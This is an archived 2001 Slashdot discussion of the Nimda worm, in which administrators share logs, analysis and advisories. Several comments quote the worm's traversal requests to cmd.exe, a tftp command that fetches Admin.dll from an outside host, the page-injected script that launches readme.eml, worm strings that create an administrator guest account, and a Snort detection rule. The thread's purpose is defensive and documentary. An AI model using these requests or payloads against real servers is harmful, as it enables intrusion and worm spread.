Forgot your password?
typodupeerror
Bug

New (More) Annoying Microsoft Worm Hits Net 1163

Posted by CmdrTaco
from the what-a-pain-in-the-arse dept.
A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J : It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

This discussion has been archived. No new comments can be posted.

New (More) Annoying Microsoft Worm Hits Net

Comments Filter:
  • by MeowMeow Jones (233640) on Tuesday September 18, 2001 @11:13AM (#2314670)
    Or is it something new?

    Looks like an exploit that's been around for a while (way before CR)
  • by Dimensio (311070) <.moc.uolgi. .ta. .ratskrad.> on Tuesday September 18, 2001 @11:14AM (#2314671)
    And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.

    It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.
    • by Anonymous Coward
      Be glad they are sitting on their hands. In my area, their way of dealing with Code Red was to disable ALL port 80 requests -- which is really a dumb way to handle it.

  • 408 worm too? (Score:5, Informative)

    by libertynews (304820) on Tuesday September 18, 2001 @11:14AM (#2314675) Homepage
    I'm seeing massive numbers of timed out requests on my sytems this morning. It started at exactly 9:06 eastern time.

    I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.

    Brian
  • Wrong name (Score:4, Informative)

    by platinum (20276) on Tuesday September 18, 2001 @11:14AM (#2314676) Homepage
    The 208.x.x.x is similiar to Code Red in that it attempts to scan local subnets (I bet you are have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.
    • by garcia (6573) on Tuesday September 18, 2001 @11:21AM (#2314748) Homepage
      it originally started in just the 63.174 for me. Now it is hitting me from all over the place. It is really nasty b/c of the number of requests that each machine sends out.

      I was surfing some porn sites this morning and they seemed horribly affected (none of the images would load and they were slow as hell).

      ugh. Just when you thought it was safe to disable "assholes_log".
    • Re:Wrong name (Score:5, Informative)

      by platinum (20276) on Tuesday September 18, 2001 @11:22AM (#2314749) Homepage
      <replying to myself>
      If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a .wav content type. This file (using strings) appears to contain numerous registry entries plus all the strings used to find and infect other servers.
    • It appears to be attempting to find rooter servers, for what purpose I can only imagine.

      Propagation of the species?

      It's interesting how worms, viruses, etc., take after biological tendencies, and almost have to be treated the same way to get rid of them: Quarantine, vaccination, precautionary measures, etc.

      It's a shame there are no drugs for this one yet.

  • here's more output (Score:4, Informative)

    by TheGratefulNet (143330) on Tuesday September 18, 2001 @11:14AM (#2314680)

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322

    www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.

    • by cphipps (103142) on Tuesday September 18, 2001 @11:31AM (#2314837) Homepage
      ...including what looks like an attempt to exploit boxes still rooted by Code Red

      Assuming that refers to this:

      "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

      then that's an exploit for Code Red II [f-secure.com] infected machines, not the original Code Red.


    • bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:08 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:08 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:08 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:09 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:09 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:09 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:09 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:10 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
      bellview-65.porterville.k12.ca.us - - [18/Sep/2001:08:42:10 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"


      notice the domainname: k12. (for those who don't recognize this, k-12 refers to kindergarten thru 12th grade. ie, kids.

      sure gives new meaning to script kiddies don't it?

  • by macpeep (36699)
    Yeah.. While I'm on Win2K and running a web server, it would never occur to me to run IIS. My logs are totally filled up with traces of this new worm. The logs also include lines such as this (IP censored).

    GET /scripts/root.exe?/c+tftp%20-i%20212.163.x.x%20GET %20Admin.dll%20Admin.dll 212.163.x.x

    Interesting..

    On the upside, I haven't had a single hit by Code Red in the past hour or so! Let's hope this one is nasty enough to get the people to finally shut down / fix their boxes!
    • by b0r1s (170449)
      uh ... none of my logs have any mention of that get request that involves the c+tftp...

      [18/Sep/2001:08:13:12 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:12 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:12 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+d ir HTTP/1.0" 404 276 "-" "-"
      [18/Sep/2001:08:13:13 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"

      So? are you bullshitting? is this a difference in logging? or are there two strings going around? I'm on the west coast, 134.x.x.x, just for general knowledge.
      • Nope.. I'm not bullshitting. I doubt it's a difference in logging either, cause I'm getting pretty much the same stuff you're getting too, but every now and then, the FTP rows. I even tried to FTP to that IP and I got in with an anonymous login! I'm Finland, for your reference..

        Maybe it's a different strain of the same thing? It started today, and I haven't gotten ANY code red since this started.
    • I decided to create a /c/winnt/system32/cmd.exe file, and once I did, I started to see the tftp GET Admin.dll part of it. I suspect it tries the others first, and if it finds one that returns OK, then it tries the tftp part.

  • by niekze (96793) on Tuesday September 18, 2001 @11:16AM (#2314689) Homepage
    Why won't someone port these to linux? Microsoft Operating Systems seem to have a monopoly in this field. For now, if you read this in a *nix, just portscan your netmask and a few others and try a few old wu-ftp exploits.

    "You have new mail, you open it. Your server begins port scanning every box on the internet. Do the server's mind? Of course not, they have nothing better to do." - New Microsoft Ad?
  • This kinda stuff isn't nice for unix servers either. I have both FreeBSD with Apache and Linux with Tomcat doing stuff and every time a worm like this comes along, my stuff drags to a halt and occaisionally crashes (if my app server is set up in a fragile way). At least I won't be perpetuating this one though.
  • I noticed that this morning on my various IDS's and was going to post on OT message in another story to see if it was affecting many people.

    I get them from inside the local net.

    I can't believe this stupid Code Red crap is still going on. I've gotten used to the constant hits. And now am I going to have to get used to this junk?? Argh! I'm just firewalling them off as they hit.
  • by flyhmstr (32953) on Tuesday September 18, 2001 @11:18AM (#2314709) Homepage
    Security focus [securityfocus.com] has some information on it, we're seeing shedloads of hits at the moment :(
  • 1300 hits so far. Each infected machine seems to be making a LOT of attempts.

    Here we go again...
  • by savaget (26702) on Tuesday September 18, 2001 @11:18AM (#2314713)
    With the new Outlook Express 6.0, you can now prevent the user from opening any attchments.


    Here is how it is done:


    Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"

  • by JeffL (5070)
    [checks logs]

    I am seeing these hits too. Since 18/Sep/2001:07:27:25 -0600 (it is now 09:16) I have been hit by 120 different machines. 105 of them are on my class B, 128.138, 14 more just start with 128, and only one is from a totally different address.

    Perhaps I should contact the admins at my site who are in charge of the offending machines.

  • Worm roll-up? (Score:2, Interesting)

    by dave-fu (86011)
    I see it looking for the exploit Code Red used, trying out MSADC and a directory traversal exploit.
    My money's on the Code Red worm being retrofit yet again to try and execute a few more tired old exploits. Which is to say hopefully Hotmail and Windows Update won't get rooted again.
    Haven't heard anything about it on Bugtraq yet; haven't checked Incidents (securityfocus.com isn't chugging along so speedily).
    It'll be interesting to see how many boxes this roots out in the light of increased press coverage of Code Red and MS's spate of security-minded tools out there. Or: how good do people feel about that leaky dam now that they've stuck their thumb in the hole labelled "Code Red"?
  • Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.

    63.73.31.242 just hit me 16 times.

    Going to http://63.73.31.242 indicates:
    "National Aerospace Documentation Home Page"
    and attempts to launch a "readme.exe" executable immediately.

    Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.

    So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.

  • Too Slow (Score:3, Informative)

    by xanadu-xtroot.com (450073) <xanaduNO@SPAMinorbit.com> on Tuesday September 18, 2001 @11:20AM (#2314731) Homepage Journal
    Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:

    ~~~~~~~~~~~~~
    Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
    The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
    ~~~~~~~~~~~~~

    OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).

    I'm using *NIX/Apache.
    I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
    (or at least, apply the damn patch already)
    • Re:Too Slow (Score:3, Funny)

      by TwP (149780)
      Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS... (or at least, apply the damn patch already)

      Preaching to the converted ;) Windows lusers don't read /. Oh wait, I'm using Mozzila on Win98 to write this. disappears in a puff of logical inconsistancy
  • by Olinator (412652) <{ude.ssamu.sc.xeh} {ta} {tods+clo}> on Tuesday September 18, 2001 @11:20AM (#2314734) Homepage
    David Korpiewski, our Windoze martyr, is hard at work on this one (I Don't Do Windows:-), and had this to say:

    Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml", "readme.eml", etc.

    A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug [guninski.com] out for IE5 that will auto execute any given .eml file.

    • I can confirm this. The readme.eml I downloaded (funny, freebsd can't execute it) is 57344 bytes large.

      Damn, I was just going to patch up some servers on a job today, and it looks like they've already been hit.

    • What does this .eml file do and how do I get rid of it?

      (I had a readme.eml file on my computer after visiting the URL of a compromised server - bad idea. However, the file was only 6k in size.)
      • by wiredog (43288)
        Step 1. Get BSD or Linux
        Step 2. Install.
        Problem fixed.
        • by Hanno (11981)
          No, problem not fixed.

          I work on a dual boot machine. I use Windows when I need it for a particular task and I use Linux when I need that for another particular task.

          Thank you for demonstrating useless advocacy without being helpful whatsoever.
  • by ergo98 (9391) on Tuesday September 18, 2001 @11:21AM (#2314743) Homepage Journal

    Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.



    2001-09-18 15:10:19 *.*.*.* GET /scripts/root.exe 404 701 72 0 - -

    2001-09-18 15:10:19 *.*.*.* GET /MSADC/root.exe 404 701 70 0 - -

    2001-09-18 15:10:19 *.*.*.* GET /c/winnt/system32/cmd.exe 404 701 80 0 - -

    2001-09-18 15:10:19 *.*.*.* GET /d/winnt/system32/cmd.exe 404 701 80 0 - -

    2001-09-18 15:10:19 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 10 - -

    2001-09-18 15:10:19 *.*.*.* GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 10 - -

    2001-09-18 15:10:20 *.*.*.* GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/c md.exe 404 701 117 0 - -

    2001-09-18 15:10:20 *.*.*.* GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../ winnt/system32/cmd.exe 404 701 145 0 - -

    2001-09-18 15:10:20 *.*.*.* GET /scripts/..Á../winnt/system32/cmd.exe 404 701 97 0 - -

    2001-09-18 15:10:20 *.*.*.* GET /scripts/winnt/system32/cmd.exe 404 701 97 10 - -

    2001-09-18 15:10:20 *.*.*.* GET /scripts/../../winnt/system32/cmd.exe 404 701 97 0 - -

    2001-09-18 15:10:20 *.*.*.* GET /scripts/..\../winnt/system32/cmd.exe 404 701 97 0 - -

    2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 98 0 - -

    2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 0 - -

    2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 100 0 - -

    2001-09-18 15:10:21 *.*.*.* GET /scripts/..%2f../winnt/system32/cmd.exe 404 701 96 0 - -

    Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).


  • More Info (Score:5, Informative)

    by Nater (15229) on Tuesday September 18, 2001 @11:21AM (#2314744) Homepage
    When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.

    I'll take a look at Admin.dll later today.
  • by Chang (2714)
    Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (ISS Unicode attack) at our location since about 9:00am EDT.

    We are seeing very heavy activity (not as bad as Code Red) since then.

  • by GodHead (101109) on Tuesday September 18, 2001 @11:27AM (#2314804) Homepage
    From NTBugTraq

    w32.nimda.amm
  • New Virus (Score:2, Informative)

    by Sternn (143817)
    I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if your not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.

    -S
  • Apache commands (Score:2, Informative)

    by man_ls (248470)
    apache_1adminconfig
    fontsmrtns2
    apacheroutedelete
    hpfontsmod_perl-1
    gettime
    big-sister-0
    apachejmeter_1
    pdfwritr
    apache-contrib1lo66293
    routedelete
    autoexec
    apachejmeter_1mod_phantomimap

    No ideas...got me what it's doing.

    I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.

    I've also gotten the snippits of the registry:
    "ware\Microsoft\Windo,b4 pull123"

    Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.

  • Aside from the Code Red usual suspects who've been hitting my server, I've seen a shitload of these, too.

    It doesn't even have a cool name yet. feh.
  • by Anonymous Coward on Tuesday September 18, 2001 @11:30AM (#2314833)
    -----BEGIN PGP SIGNED MESSAGE-----

    There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.

    It appears that the attacks can come both from email and from the network.

    A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)

    The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.

    One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.

    Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP.

    Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;

    edit %systemroot/system32/drivers/etc/services.

    change the line;

    tftp 69/udp

    to;

    tftp 0/udp

    thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.

    More information as it arises.

    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

    -----BEGIN PGP SIGNATURE-----
    Version: PGP Personal Privacy 6.5.2

    iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMM DU ChVqn6yReQXqEH
    Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJ Uu pDHB1Yy1DY/po6
    iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQja mK I2eqd4TdE0yfIO
    hSW7yN2lhJc=
    =YAwc
    -----END PGP SIGNATURE-----
  • Damn it! (Score:4, Interesting)

    by Reality Master 101 (179095) <RealityMaster101@NOSpam.gmail.com> on Tuesday September 18, 2001 @11:32AM (#2314848) Homepage Journal

    Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.

    The HTTP port doesn't bug me as much as they have also blocked my mail port.

    Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?

  • Snort rule (Score:3, Informative)

    by AftanGustur (7715) on Tuesday September 18, 2001 @11:32AM (#2314851) Homepage


    Add this to your in-house SnortRules file.

    alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)

  • Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)

    My DSL to home is completely swamped ... I can't even get a ping through.
  • At the height of code red I was getting ~60 hits a day. This beast has hit my system over 3000 times today.

    Yow.
  • I just samspaded one of the IP's thats been hitting our site. it places a bit of javascript code at the bottom of the page that basically forces IE to download readme.exe. DO NOT TRY TO GO TO AN INFECTED IP ADDRESS.
  • Coordinated DDOS? (Score:3, Interesting)

    by dschuetz (10924) <[gro.tensad.divad] [ta] [hsals]> on Tuesday September 18, 2001 @11:39AM (#2314902) Homepage
    If we really are seeing a marked increase in worm traffic (and it's not just everyone suddenly noticing, now that others have brought it up -- just being cautious, eh?), then could it be possible that this might be part of, or a prelude to, a DDOS attack?

    The NIPC issued the following advisory: Potential Distributed Denial of Service (DDoS) Attacks [nipc.gov] on Monday, talking about reports of people preparing for DDOS attacks on computer and commerce infrastructures. In particular: On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.

    Of course, this could just be an ill-timed release of yet another worm (like there're "well-timed" releases?). I just thought that this was particularly spooky, reading this alert after seeing this worm story...
  • Appeded JavaScript (Score:2, Informative)

    by _Bunny (90075)
    I've telneted to several of the hosts that have probed us in the last hour.

    It appears that this new worm is appending the following JavaScript snippet to all pages that the server sends:

    <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000 ")</script></html>
    Not sure what this JavaScript is suppose to do, but it's there none the less.

    - Matt
    • The readme.eml file is the payload. Due to what I can only hope is a bug in IE, this type of file will *automatically* execute.

      The file seems to be written in unicode, and has some registry strings in it -- I haven't had a chance to completely dissect it yet.
  • Still have access to one of the systems i used to run at my alma mater. im getting SCREENFULLS of logs scrolling by, super fast. Many many hits.

    This looks bad.
  • Some of the lines from the registry it tries to import:

    SYSTEM\CurrentControlSet\Services\Tcpip\Paramete rs \Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0

    Search for 'Concept Virus' to see if you're infected, I guess.
  • Taco would've know about this months ago. It was annouced here [bbspot.com].
  • My wife called from home saying, "Something is putting EML files all over my computer...(pause)...and yours too"

    I am running IIS on win2k, have applied the code red patch. Note: I am building the Linux/Apache server RIGHT now, so IIS is on the way out. But if anyone has any idea how this is happening, I'd love the info.

    Looks like this thing kicked off almost excatly one week after the WTC stuff.

  • Wouldn't it make buffer overruns harder if stacks grew the other way? Is there a reason why a stack can't go upwards?
    • Sadly, I don't think it would help. I thought about this for a moment, and came up with the following... someone please feel free to correct me if I'm mistaken.

      Most buffer overflows are due to code such as:

      void BadFunction(void)
      {
      char badBuf[100];
      strcpy(badBuf,longString);
      ...

      So, your stack looks like:

      --> increasing memory address
      [badBuf 100 bytes][ebp][return addr]

      Standard overflow attacks involve scribbling on the return addr.

      Now, let's suppose your stack goes the other way... once the code enters the strcpy function, we'll have:

      --> increasing memory address
      [return addr][ebp][badBuf][retaddr#2][ebp#2]...

      Where retaddr#2 and ebp#2 are the return address from strcpy back into BadFunction, and the corresponding stack frame ptr respectively.

      Notice that we can now overflow badBuf to scribble on retaddr#2. Thus, when strcpy returns, we can still jump to arbitrary locations. Slightly different approach, same effect.

      Again - this *seems* like it would work, but if anyone can see a flaw, please correct me.

  • by CiaranC (69596) on Tuesday September 18, 2001 @11:53AM (#2314989)
    TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm

    Date: September 18, 2001
    Time: 1000 EDT

    RISK INDICES:

    Initial Assessment: RED HOT

    Threat: VERY HIGH, (rapidly increasing)

    Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
    5.0, and internal networks.

    Cost: High, command execution is possible

    Vulnerable Systems: IIS 4.0 and 5.0

    SUMMARY:
    A new IIS worm is spreading rapidly. Its working name is Nimda:
    W32.nimda.a.mm

    It started about 9am eastern time today, Tuesday,September 18, 2001,
    Mulitple sensors world-wide run by TruSecure corporation are getting
    multiple hundred hits per hour. And began at 9:08am am.

    The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
    multiple vulnerabilities including:

    Almost all are get scripts, and a get msadc (cmd.exe)
    get_mem_bin
    vti_bin owssvr.dll
    Root.exe
    CMD.EXE
    ../ (Unicode)
    Getadmin.dll
    Default.IDA
    /Msoffice/ cltreq.asp

    This is not code red or a code red variant.

    The worm, like code red attempts to infect its local sub net first,
    then spreads beyond the local address space.

    It is spreading very rapidly.

    TruSecure believes that this worm will infect any IIS 4 and IIS 5
    box with well known vulnerabilities. We believe that there are
    nearly 1Million such machines currently exposed to the Internet.

    Risks Indices:
    Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
    Internet Web server hosts: TruSecure process and essential
    configurations should generally be protective. The vulnerability
    prevalence world-wide is very high

    Threat - VERY HIGH and Growing The rate of growth and spread is
    exceedingly rapid - significantly faster than any worm to date and
    significantly faster than any variant of Code red.

    Cost -- Unknown, probably moderate per infected system.

    The worm itself is a file called
    README.EXE, or ADMIN.DLL
    a 56K file which is advertised as an audio xwave mime type file.

    Other RISKS:
    There is risk of DOS of network segments by traffic volume alone
    There is large risk of successful attack to both Internet exposed IIS
    boxes and to developer and Intranet boxes inside of corporations.

    Judging by the Code Red II experience, we expect many subtle routes
    of infection leading to inside corporate infections.

    We cannot discount the coincidence of the date and time of release,
    exactly one week to (probably to the minute) as the World Trade
    Center attack .

    REPLICATION:
    There are at least three mechanisms of spread:
    The worm seems to spread both by a direct IIS across Internet (IP
    spread)
    It probably also spreads by local shares. (this is not known for
    sure at this time)
    There is also an email vector where README.EXE is sent via email to
    numerous accounts.

    Mitigations
    TruSecure essential practices should work.
    Block all email with EXE attachments
    Filter for README.EXE
    Make sure IIS boxes are well patched and hardened, or removed from
    both the Internet and Intranets.
    Make sure any developer computing platforms are not running IIS of
    any version (many do so by default if either.
    Disconnect mail from the Internet
    Advise users not to double click on any unexpected attachments.
    Update anti-virus when your vendor has the signature.
  • I'm getting pretty hammered with the mentioned worm, but look at this fun one i just pulled out of my logs.

    2001-09-18 05:45:32 195.124.124.237 - 216.119.90.176 GET /default.ida
    Code_Green_<I_like_the_colour-_-><AntiCod eRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_ by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_to _my_sisterli_'Doro'.Save_Whale_and_visit_<www.b uhaboard.de>_and_<www.buha-security.de>%u 9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003 %u8b00%u531b%u53ff%u0078%u0000%u00=a
    200 206 5995 500 HTTP/1.0 - - - -

  • by undie (140711) on Tuesday September 18, 2001 @11:57AM (#2315021) Homepage
    Here are some interesting strings found in the readme.exe this worm sends down (some stuff snipped):

    Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

    SYSTEM\CurrentControlSet\Services\lanmanserver\S ha res\Security
    share c$=c:\
    user guest ""
    localgroup Administrators guest /add
    localgroup Guests guest /add
    user guest /active
    open
    user guest /add
    HideFileExt

    /scripts
    /MSADC
    /scripts/..%255c..
    /_vti_bin/..%255c../..%255c../..%255c..
    /_mem_bin/..%255c../..%255c../..%255c..
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../.. %c 1%1c../..%c1%1c..
    /scripts/..%c1%1c..
    /scripts/..%c0%2f..
    /scripts/..%c0%af..
    /scripts/..%c1%9c..
